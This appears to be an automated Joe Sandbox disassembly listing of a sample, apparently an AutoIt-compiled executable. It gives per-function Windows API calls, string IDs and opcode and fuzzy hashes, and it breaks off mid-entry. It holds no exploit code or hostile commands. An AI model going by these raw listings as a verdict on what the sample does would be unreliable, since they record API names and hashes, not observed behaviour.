                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 2889450990-3420473620
                                    • Opcode ID: 996dddbd7bdde98fb1d5fd4dff785a0be5027a91b14e1f4975e6c916aafbc053
                                    • Instruction ID: 5c5e5b72a82603096281f48ecdbe3c16fa932c06ebc61937ea398f7ef75c3fe2
                                    • Opcode Fuzzy Hash: 996dddbd7bdde98fb1d5fd4dff785a0be5027a91b14e1f4975e6c916aafbc053
                                    • Instruction Fuzzy Hash: C7517C72800609BACB15FBE0CD46FEEBB78AF44340F100469F50972192EA356E99DB61
                                    Function 009C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C55D7
                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009C5664
                                    • GetMenuItemCount.USER32(00A41708), ref: 009C56ED
                                    • DeleteMenu.USER32(00A41708,00000005,00000000,000000F5,?,?), ref: 009C577D
                                    • DeleteMenu.USER32(00A41708,00000004,00000000), ref: 009C5785
                                    • DeleteMenu.USER32(00A41708,00000006,00000000), ref: 009C578D
                                    • DeleteMenu.USER32(00A41708,00000003,00000000), ref: 009C5795
                                    • GetMenuItemCount.USER32(00A41708), ref: 009C579D
                                    • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C57D3
                                    • GetCursorPos.USER32(?), ref: 009C57DD
                                    • SetForegroundWindow.USER32(00000000), ref: 009C57E6
                                    • TrackPopupMenuEx.USER32(00A41708,00000000,?,00000000,00000000,00000000), ref: 009C57F9
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C5805
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 3993528054-0
                                    • Opcode ID: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                    • Instruction ID: 1694ae4dcb91ffba33a1ccd35ace7fcbdba3c28fd9514474dbd0f09b328aa48a
                                    • Opcode Fuzzy Hash: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                    • Instruction Fuzzy Hash: BC71F471A40A09BFEB209B54CD49FAABF69FF40368F250209F518AA1D1C7717C90DB92
                                    Function 009BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009BA1DC
                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009BA211
                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009BA22D
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009BA249
                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009BA273
                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009BA29B
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2A6
                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                    • API String ID: 1687751970-22481851
                                    • Opcode ID: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                    • Instruction ID: 703979713b5aedd512b4a86f851bfd9901dbd61e039a3d3507105a3eaad16b69
                                    • Opcode Fuzzy Hash: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                    • Instruction Fuzzy Hash: 7141E676C1062DAADB11EFE4DC85EEDB7B8BF44310F004469F815A72A1EB709E05CB90
                                    Function 009E3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                    • Instruction ID: 4649a98ed83e7d52198371be860b1c480b3133cf7e7b3e19d0bb98f6d57832bf
                                    • Opcode Fuzzy Hash: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                    • Instruction Fuzzy Hash: 08414D3051028A9BDF01EF15DC55AEA3369BFA6340F508858FCD65B392EB71EE4ACB50
                                    Function 009C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009F36F4,00000010,?,Bad directive syntax error,00A1DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009C25D6
                                    • LoadStringW.USER32(00000000,?,009F36F4,00000010), ref: 009C25DD
                                    • _wprintf.LIBCMT ref: 009C2610
                                    • __swprintf.LIBCMT ref: 009C2632
                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009C26A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                    • API String ID: 1080873982-4153970271
                                    • Opcode ID: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                    • Instruction ID: b5c0463ef9b926ad9d378b6c52c79dee850257cdb7616e8fde12a6ee4a0c74f9
                                    • Opcode Fuzzy Hash: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                    • Instruction Fuzzy Hash: CC215E7280021EBFCF11FB90CC4AFEE7B79BF18304F00485AF505661A2DA71A619DB61
                                    Function 009C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009C7B42
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009C7B58
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009C7B69
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009C7B7B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009C7B8C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: SendString
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 890592661-1007645807
                                    • Opcode ID: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                    • Instruction ID: df087efa814d35ce8d9a8fb8984f2010dde3a4f56e96c9dadc6170ea029750b9
                                    • Opcode Fuzzy Hash: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                    • Instruction Fuzzy Hash: 1B1194E2A542597ADB20F7A5CC4AEFFBA7CFBD1B10F0008197411A61D1DA605E49CAB1
                                    Function 009C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 009C7794
                                      • Part of subcall function 0099DC38: timeGetTime.WINMM(?,75A8B400,009F58AB), ref: 0099DC3C
                                    • Sleep.KERNEL32(0000000A), ref: 009C77C0
                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009C77E4
                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 009C7806
                                    • SetActiveWindow.USER32 ref: 009C7825
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009C7833
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 009C7852
                                    • Sleep.KERNEL32(000000FA), ref: 009C785D
                                    • IsWindow.USER32 ref: 009C7869
                                    • EndDialog.USER32(00000000), ref: 009C787A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
                                    • Instruction ID: 53e20495ac89392b187b44308b2a34250375c1e84c42b4531877c2b7be117459
                                    • Opcode Fuzzy Hash: 47c245c66966cbe41b558bbf0c03b12953ba49dc722ccadf0938fe157a3d2336
                                    • Instruction Fuzzy Hash: BD213EBA604209AFEB019FE0ECC9F2A7F79FB85348F000018F50596162DB626D13DE22
                                    Function 009D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CoInitialize.OLE32(00000000), ref: 009D034B
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009D03DE
                                    • SHGetDesktopFolder.SHELL32(?), ref: 009D03F2
                                    • CoCreateInstance.OLE32(00A0DA8C,00000000,00000001,00A33CF8,?), ref: 009D043E
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009D04AD
                                    • CoTaskMemFree.OLE32(?,?), ref: 009D0505
                                    • _memset.LIBCMT ref: 009D0542
                                    • SHBrowseForFolderW.SHELL32(?), ref: 009D057E
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009D05A1
                                    • CoTaskMemFree.OLE32(00000000), ref: 009D05A8
                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009D05DF
                                    • CoUninitialize.OLE32(00000001,00000000), ref: 009D05E1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 1246142700-0
                                    • Opcode ID: d942af32546ce38f4cc3659a7e38328f826ec87b8120fa4543377bd991f460ae
                                    • Instruction ID: a2a08c99493c9f980865583f0bddf9f1420b371a85e02abd0dd9ea7e5cddd7dd
                                    • Opcode Fuzzy Hash: d942af32546ce38f4cc3659a7e38328f826ec87b8120fa4543377bd991f460ae
                                    • Instruction Fuzzy Hash: FDB1B775A00209AFDB04DFA4D889EAEBBB9AF88304F148459F919EB351DB30ED45CB50
                                    Function 009C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 009C2ED6
                                    • SetKeyboardState.USER32(?), ref: 009C2F41
                                    • GetAsyncKeyState.USER32(000000A0), ref: 009C2F61
                                    • GetKeyState.USER32(000000A0), ref: 009C2F78
                                    • GetAsyncKeyState.USER32(000000A1), ref: 009C2FA7
                                    • GetKeyState.USER32(000000A1), ref: 009C2FB8
                                    • GetAsyncKeyState.USER32(00000011), ref: 009C2FE4
                                    • GetKeyState.USER32(00000011), ref: 009C2FF2
                                    • GetAsyncKeyState.USER32(00000012), ref: 009C301B
                                    • GetKeyState.USER32(00000012), ref: 009C3029
                                    • GetAsyncKeyState.USER32(0000005B), ref: 009C3052
                                    • GetKeyState.USER32(0000005B), ref: 009C3060
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
                                    • Instruction ID: adeedbbdc90c85658af4f753157ff580513416a319f17dfe05db6b23b4be720f
                                    • Opcode Fuzzy Hash: 8d6ebf7654ff4059dc1189d1768950b77223ca289e41b8149608731b1698a0ef
                                    • Instruction Fuzzy Hash: BD51A565E0879829FB35DBA48811FEABBB85F11340F08C59DD5C25B1C2DA949B8CC7A3
                                    Function 009BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 009BED1E
                                    • GetWindowRect.USER32(00000000,?), ref: 009BED30
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009BED8E
                                    • GetDlgItem.USER32(?,00000002), ref: 009BED99
                                    • GetWindowRect.USER32(00000000,?), ref: 009BEDAB
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009BEE01
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEE0F
                                    • GetWindowRect.USER32(00000000,?), ref: 009BEE20
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009BEE63
                                    • GetDlgItem.USER32(?,000003EA), ref: 009BEE71
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009BEE8E
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 009BEE9B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
                                    • Instruction ID: 0aaa43c25fdec5c40c032c82208d8e9395215d5e749e761fc5e47b1a29f84123
                                    • Opcode Fuzzy Hash: c93006b8b04127241b4566acccfe62eaf436495ae73aa7cf9ec0bdd6b6295a9b
                                    • Instruction Fuzzy Hash: 68511171B10209AFDB18CFA9DD99AAEBBBAFB88710F14812DF519D7290D771DD018B10
                                    Function 0099B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0099B759,?,00000000,?,?,?,?,0099B72B,00000000,?), ref: 0099BA58
                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
                                    • DestroyAcceleratorTable.USER32(00000000), ref: 009FD8A6
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8D7
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD8EE
                                    • 6F520860.COMCTL32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 009FD90A
                                    • DeleteObject.GDI32(00000000), ref: 009FD91C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: F520860$Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                    • String ID:
                                    • API String ID: 4208914780-0
                                    • Opcode ID: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
                                    • Instruction ID: c84c90877f47d5d7f55201850cb3804c9a6dbe62dacdbd37ed98d3d7c60f09b0
                                    • Opcode Fuzzy Hash: ffde16b8d951e87e7f21bc6320f2747c5ec6b6498de57bf8aa589af8a56b45d0
                                    • Instruction Fuzzy Hash: 0E61DC39502604DFDF25DF99EA88B35B7FAFF85312F150519E14686A70C779A8C2CB40
                                    Function 0099B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • GetSysColor.USER32(0000000F), ref: 0099B438
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
                                    • Instruction ID: 37d6f6a8775c1e8067b976ae15d5a2937b959b7bad3aa5f75e90089e34986812
                                    • Opcode Fuzzy Hash: c855533861af610b58446e0608e433e376b7732e3d5320c555bc951d7536b4d6
                                    • Instruction Fuzzy Hash: 2D41A3351011089BEF209FACED89BB93B6AAB46731F144365FE658A1F6D7348C42E721
                                    Function 009C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                    • String ID:
                                    • API String ID: 136442275-0
                                    • Opcode ID: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
                                    • Instruction ID: c462155a841601a6723d971ece8441b98e550fd7948a056a733a8733e2be8fba
                                    • Opcode Fuzzy Hash: a0b6364969e7db60eaa579af2f8bc3b3ade750042c6e544a49bef1c3682ad833
                                    • Instruction Fuzzy Hash: 2341117784521CAECF61DB94CC45EDF73BCEB85310F0041A6B659A2051EB30ABE58F91
                                    Function 009CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(00A1DC00,00A1DC00,00A1DC00), ref: 009CD7CE
                                    • GetDriveTypeW.KERNEL32(?,00A33A70,00000061), ref: 009CD898
                                    • _wcscpy.LIBCMT ref: 009CD8C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 32ddf1728cd2e810751ae04ca0a82f09f4545aaf38ef5b225bacecdd4c01fab9
                                    • Instruction ID: 9a270c8c1b6d36d5288143b834ef689e52ff9d7c9a430613ed1828b825688ead
